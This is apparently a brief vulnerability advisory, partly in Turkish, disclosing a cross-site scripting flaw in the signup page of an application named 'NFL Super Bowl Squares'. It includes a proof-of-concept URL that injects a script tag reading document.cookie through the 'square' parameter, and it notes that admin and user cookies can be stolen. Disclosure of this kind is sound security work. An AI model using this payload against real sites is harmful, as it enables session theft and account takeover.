< ------------------- header data start ------------------- >

#############################################################

# Application Name : NFL Super Bowl Squares

# Vulnerable Type : Cross Site Scripting ( XSS )

# Infection : Yönetici ve User cookie’leri çalinabilir.

# Bug Fix Advice : Zararli karakterler filtrelenmelidir.

# author : Bug Researchers/HayBer

#############################################################

< ------------------- header data end of ------------------- >



< -- bug code start -- >

/superbowl/signup.php?square=><script>alert(document.cookie)</script>

< -- bug code end of -- >